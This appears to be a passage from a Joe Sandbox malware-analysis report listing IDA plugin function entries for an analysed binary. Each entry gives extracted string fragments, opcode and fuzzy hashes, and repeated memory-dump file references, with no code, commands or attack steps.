                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: &*f[$*2$7v~o$U$[$Vc{$Xo*T$[Yw$[d={$ajy${{{$/[
                                                                                                                    • API String ID: 0-3666506315
                                                                                                                    • Opcode ID: 6728ca8fbbc17d669af8bec3559b876f87fa4291b6c2f40617a16db926186a72
                                                                                                                    • Instruction ID: f8292bd119944e8c878cb0109207e7eee0cf8971a887cc38072abc13e6b3922e
                                                                                                                    • Opcode Fuzzy Hash: 6728ca8fbbc17d669af8bec3559b876f87fa4291b6c2f40617a16db926186a72
                                                                                                                    • Instruction Fuzzy Hash: CDB206F3A082049FE3046F2DEC8567ABBE9EF94720F16493DEAC4C3744EA7558058696
                                                                                                                    Function 0011DD29 Relevance: 14.9, Strings: 11, Instructions: 1142COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+($)IgK$,Q?S$-M2O$<Y.[$=]+_$Y9N;$hX]N$n\+H$upH}${E
                                                                                                                    • API String ID: 0-1557708024
                                                                                                                    • Opcode ID: e0cf6b799fe11f1f06486821a3aeafe41641f028a22af4e778ce416fcef8eadc
                                                                                                                    • Instruction ID: 34dd4c79deef7161e92e4baefa683404af5ca8709c8e07552decf2767afba7b4
                                                                                                                    • Opcode Fuzzy Hash: e0cf6b799fe11f1f06486821a3aeafe41641f028a22af4e778ce416fcef8eadc
                                                                                                                    • Instruction Fuzzy Hash: F9920575E00215DFDB08CFA8D8516AEBBF2FF4A310F194168E855AB3A1D735AD81CB90
                                                                                                                    Function 002C4A23 Relevance: 12.8, Strings: 9, Instructions: 1540COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5^t$Ag}/$C]+$FQsy$FQsy$az{$b >y$f1[$zu[s
                                                                                                                    • API String ID: 0-2701978200
                                                                                                                    • Opcode ID: b6753cc5ab45ef021cfa4f432f8017fbafad630316e08031200d7cdf573a47db
                                                                                                                    • Instruction ID: e3b94b7b1d3828412aba973d4768080b68bdf95eb9dfb0dc9764d60fee82c36b
                                                                                                                    • Opcode Fuzzy Hash: b6753cc5ab45ef021cfa4f432f8017fbafad630316e08031200d7cdf573a47db
                                                                                                                    • Instruction Fuzzy Hash: F4B203F3A0C2049FE304AF2DEC8566ABBE5EF94720F16893DEAC483744E63558158797
                                                                                                                    Function 002C97BA Relevance: 11.6, Strings: 8, Instructions: 1648COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $}?o$/SuW$HFm$M;;$M@UG$QS}$T6{o$n<{
                                                                                                                    • API String ID: 0-750467777
                                                                                                                    • Opcode ID: 368a882e9fe9908024ae86808523574c61845dbbdfd57fb871ad983338f9ed5a
                                                                                                                    • Instruction ID: e2acb075f3438d4bb8edff60f10fb46a0fcba4f578d7c6eed3b9dfb18bdf911c
                                                                                                                    • Opcode Fuzzy Hash: 368a882e9fe9908024ae86808523574c61845dbbdfd57fb871ad983338f9ed5a
                                                                                                                    • Instruction Fuzzy Hash: B8B209B3A0C2149FE304AE2DDC8567AFBE9EF94720F1A893DE6C5D3744E63558018792
                                                                                                                    Function 0011098B Relevance: 10.8, Strings: 8, Instructions: 836COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+($&> &$,#15$9.5^$cah`$gce/$qrqp${
                                                                                                                    • API String ID: 0-4102007303
                                                                                                                    • Opcode ID: 78c58d45da00ae4dbc31491fedb51bf1b26ab5d7f718f2dbf50ad76754114b36
                                                                                                                    • Instruction ID: e4a18b3eb09e414d2d68de7ef0aabe42f218447ae1364ae710b5e7bfabc7f2b5
                                                                                                                    • Opcode Fuzzy Hash: 78c58d45da00ae4dbc31491fedb51bf1b26ab5d7f718f2dbf50ad76754114b36
                                                                                                                    • Instruction Fuzzy Hash: 3A62BBB56083818BD734CF14D891BEBB7E1FF9A314F04492DE59A8BA52E3759880CB53
                                                                                                                    Function 000F1000 Relevance: 10.5, Strings: 7, Instructions: 1785COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
                                                                                                                    • API String ID: 0-2517803157
                                                                                                                    • Opcode ID: c4b81a63d075d311560932e71c1850426537b6e06a319d66288b90c8f5234434
                                                                                                                    • Instruction ID: c75365c3d52a05f372ce5a1aa259ac1661cf8568137b1a246a711665f62c9b82
                                                                                                                    • Opcode Fuzzy Hash: c4b81a63d075d311560932e71c1850426537b6e06a319d66288b90c8f5234434
                                                                                                                    • Instruction Fuzzy Hash: D1D202316083458FC718CE28C4943BEBBE2AFD9314F188A2DE699C7791D774D945EB82
                                                                                                                    Function 002BA8A1 Relevance: 9.2, Strings: 6, Instructions: 1661COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !fUj$&A-$.xk_$e-qk$l<fl$kgq
                                                                                                                    • API String ID: 0-2342659254
                                                                                                                    • Opcode ID: a2c45df87e835145921e13a7ee0f12bd2ec7566286cc49a39d2f35051eb8c3bd
                                                                                                                    • Instruction ID: 05db55b7cb2b9c58d3af26f366c759493158fb951ac0d68287d1c27506866659
                                                                                                                    • Opcode Fuzzy Hash: a2c45df87e835145921e13a7ee0f12bd2ec7566286cc49a39d2f35051eb8c3bd
                                                                                                                    • Instruction Fuzzy Hash: 9DB228F360C2049FE7046E2DEC9567AB7E9EF94620F1A493DEAC5C3744EA3598008697
                                                                                                                    Function 002C2FB6 Relevance: 9.1, Strings: 6, Instructions: 1593COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8?~7$KE{m$Y/$auwg$c.w]$=s
                                                                                                                    • API String ID: 0-1571089790
                                                                                                                    • Opcode ID: f700152437229674ffdcc55da4df180c359c58c57ee45ba3579986a0d00e0dab
                                                                                                                    • Instruction ID: c35d900f746ee4a8a53ee9aac3fdf769947dc9251bca279b459952ff5dc90f68
                                                                                                                    • Opcode Fuzzy Hash: f700152437229674ffdcc55da4df180c359c58c57ee45ba3579986a0d00e0dab
                                                                                                                    • Instruction Fuzzy Hash: F2B229F3A082109FD704AE2DEC8567AFBE9EF94720F1A493DEAC4C7744E63558018796
                                                                                                                    Function 000F12F7 Relevance: 7.2, Strings: 5, Instructions: 922COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0$0$0$@$i
                                                                                                                    • API String ID: 0-3124195287
                                                                                                                    • Opcode ID: 0f88c362eab832d501cf031b13cca04b74dbcf896209daea4562cb649a2c8ab1
                                                                                                                    • Instruction ID: b8f74ff3ecbe003f7a3a551cb0ce0b061e6794d94aea74fdaf9c2d1bb36240d9
                                                                                                                    • Opcode Fuzzy Hash: 0f88c362eab832d501cf031b13cca04b74dbcf896209daea4562cb649a2c8ab1
                                                                                                                    • Instruction Fuzzy Hash: 8C62E07160C3858BC318CF28C49077EBBE1AFD5344F188A2DEAD987691D774D949EB82
                                                                                                                    Function 000F164F Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                    • API String ID: 0-1123320326
                                                                                                                    • Opcode ID: 523180c4f034b53854828ece19fec1816639384e62dbe97a9e070e6a2ae5ac20
                                                                                                                    • Instruction ID: 59af2f7c59842907c7ae2090f010e6362e4af9938d383ad78e86edb3f9706ccd
                                                                                                                    • Opcode Fuzzy Hash: 523180c4f034b53854828ece19fec1816639384e62dbe97a9e070e6a2ae5ac20
                                                                                                                    • Instruction Fuzzy Hash: 50F1CE3160C3858FC719CE28C4842AEFBE2AFD9304F188A6DE5D987752D774D948DB92
                                                                                                                    Function 002BDE5E Relevance: 6.7, Strings: 4, Instructions: 1678COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: *g$6Aa$JBKi$c&ry
                                                                                                                    • API String ID: 0-725859046
                                                                                                                    • Opcode ID: f5830b39bcda074db764d11f8dd71c9db4e6bbd5effdb7e370e4cc9808a03e01
                                                                                                                    • Instruction ID: 523cd572e5a762535bc8ccb74a10011197ba237e739b23ad1ad4c6dacb5182d1
                                                                                                                    • Opcode Fuzzy Hash: f5830b39bcda074db764d11f8dd71c9db4e6bbd5effdb7e370e4cc9808a03e01
                                                                                                                    • Instruction Fuzzy Hash: 85B229F360C304AFE3086E2DEC9567ABBE9EF94320F1A453DE6C5C7740EA7558018696
                                                                                                                    Function 002C14DD Relevance: 6.6, Strings: 4, Instructions: 1649COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: m:$/Gf-$4k$\wo
                                                                                                                    • API String ID: 0-1261717761
                                                                                                                    • Opcode ID: ebb11fb1f1129d65687164913d5980bcd44bcb9bd83519294151e6d3b3f1b29c
                                                                                                                    • Instruction ID: 05d446cf41f2c7bb711323555537b4bb621e304c94b085bbfe85bffdccea26a6
                                                                                                                    • Opcode Fuzzy Hash: ebb11fb1f1129d65687164913d5980bcd44bcb9bd83519294151e6d3b3f1b29c
                                                                                                                    • Instruction Fuzzy Hash: DCB2C3F360C204AFE7046E29EC8567ABBE9EF94720F1A493DEAC4C3740E63558058697
                                                                                                                    Function 000F13A3 Relevance: 6.6, Strings: 5, Instructions: 390COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                    • API String ID: 0-3620105454
                                                                                                                    • Opcode ID: 8ba0d04e21242906699ea2f5988a8812c1722aa3323cddaf5bd8b41ea3b26613
                                                                                                                    • Instruction ID: fae0cb5eeedf2df9b578907a4f9f7f8bf06e252a9c767d556ae6ecc84a80ee8d
                                                                                                                    • Opcode Fuzzy Hash: 8ba0d04e21242906699ea2f5988a8812c1722aa3323cddaf5bd8b41ea3b26613
                                                                                                                    • Instruction Fuzzy Hash: CFD1BF3160C7868FC719CE29C4842AAFBE2AFD9304F08CA6DE5D987752D334D949DB52
                                                                                                                    Function 0011FD10 Relevance: 5.7, Strings: 4, Instructions: 667COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
